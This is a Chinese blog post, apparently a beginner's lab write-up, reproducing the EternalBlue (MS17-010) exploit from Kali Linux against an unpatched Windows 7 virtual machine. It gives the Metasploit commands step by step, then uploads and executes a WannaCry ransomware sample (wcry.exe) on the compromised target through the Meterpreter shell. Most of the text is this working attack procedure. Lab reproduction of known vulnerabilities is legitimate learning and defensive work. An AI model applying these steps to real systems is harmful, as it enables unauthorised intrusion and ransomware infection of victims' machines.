MS17-010漏洞复现并尝试在靶机内植入勒索病毒

        作为一个刚刚入圈的小白,闲来无事准备复现一下永恒之蓝(MS17-010),不多废话直接上货(如果植入破坏性病毒建议给你的镜像来个快照)。

        首先需要准备VMware Workstation Pro部署Kali以及带有MS17-010漏洞的靶机Windows7纯净版映像,已确定带有MS17-010漏洞,磁链下载。https://msdn.itellyou.cn/

Windows7的镜像就默认下一步就完事了,你啥也别动就能装好 。


kali下载,这个怎么下就看怎么舒服了。https://www.kali.org/get-kali/#kali-platforms

选择VMware64进行下载,建议装的时候选图形加中文(默认密码:kali)。

        运行时网络选择桥接网络,并同时开启kali与Windows7(Windows7记得开一下网络共享)。

        打开kali的控制台输入:sudo su + 你的密码 进入root用户(这是怕权限不够报错)  进入root用户后输入:msfconsole调取msf(最新版本的调取后控制台名称应该为 msf6 )  

        调取成功后:search ms17_010 调取攻击模块,调取成功后:use 编号或全称(编号是#下面的数字,由0开始 全称是编号后面的名称)

选择模块后进行设置:show options  查看设置项 (required必须设置的选项) 

  这个时候我们前面查的ip就派上用场了(狗头) 在kali控制台直接:ping 靶机的IP(ctrl+c就能停)确定IP地址没问题后:set RHOSTS 靶机IP 最后一步 run!

出现如下的字段就代表成功了,如果没有建议检查IP段,打印机共享等是否开启或正确。 

进去之后把病毒样本放进kali里面然后 upload /tmp/wcry.exe c://

/后面的是你的路径和文件名需要改 然后执行:shell        c:/wcry.exe


 复现成功,跟我预想的其实差不多,后面用快照恢复一下就啥事情都没有了。

  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值